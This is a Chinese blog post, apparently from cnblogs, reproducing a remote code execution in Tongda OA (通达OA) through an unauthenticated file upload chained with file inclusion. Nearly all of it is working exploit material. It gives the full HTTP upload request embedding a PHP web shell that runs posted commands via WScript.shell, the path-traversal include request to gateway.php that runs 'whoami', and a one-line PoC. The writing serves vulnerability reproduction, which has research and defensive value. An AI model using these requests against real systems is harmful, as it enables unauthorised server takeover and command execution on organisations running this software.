• 通达OA rce复现


    通达OA下载:链接:https://pan.baidu.com/s/1c0P-M-IyY5VxfH5d0qKHsQ 提取码:l0pc

    漏洞原因:未授权文件上传 + 文件包含(利用nginx日志也可以getshell)

    数据包:

    POST /ispirit/im/upload.php HTTP/1.1
    Host: 192.168.1.250
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
    Referer: http://192.168.95.129/logincheck.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: multipart/form-data; boundary=--------1673801018
    Content-Length: 556
    
    ----------1673801018
    Content-Disposition: form-data; name="UPLOAD_MODE"
    
    2
    ----------1673801018
    Content-Disposition: form-data; name="P"
    
    123
    ----------1673801018
    Content-Disposition: form-data; name="DEST_UID"
    
    2
    ----------1673801018
    Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
    Content-Type: image/jpeg
    
    <?php
    $command=$_POST['cmd'];
    $wsh = new COM('WScript.shell');
    $exec = $wsh->exec("cmd /c ".$command);
    $stdout = $exec->StdOut();
    $stroutput = $stdout->ReadAll();
    echo $stroutput;
    ?>
    ----------1673801018--
    

    返回内容:
    +OK [vm]258@2003_564066977|jpg|0[/vm]

    然后直接文件包含Getshell

    POST /ispirit/interface/gateway.php HTTP/1.1
    Host: 192.168.1.250:8083
    Content-Length: 97
    Cache-Control: max-age=0
    Origin: http://192.168.1.250:8083
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.1.250:8083/ispirit/interface/gateway.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=952b1f1; PHPSESSID=lcq472fa3fm9u7k8dmlg0ofap4
    Connection: close
    
    json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F564066977.jpg%22%7D&cmd=whoami
    

    poc:json={"url":"/general/../../attach/im/2003/564066977.jpg"}&cmd=whoami

  • 相关阅读:
    index()方法
    extend()方法
    count()方法
    copy()方法
    clear()方法
    append()方法
    IE botton 点击文字下沉
    IE滚动条
    关闭windows10自动更新
    vue文件名规范
  • 原文地址:https://www.cnblogs.com/nul1/p/12566816.html
Copyright © 2020-2023  润新知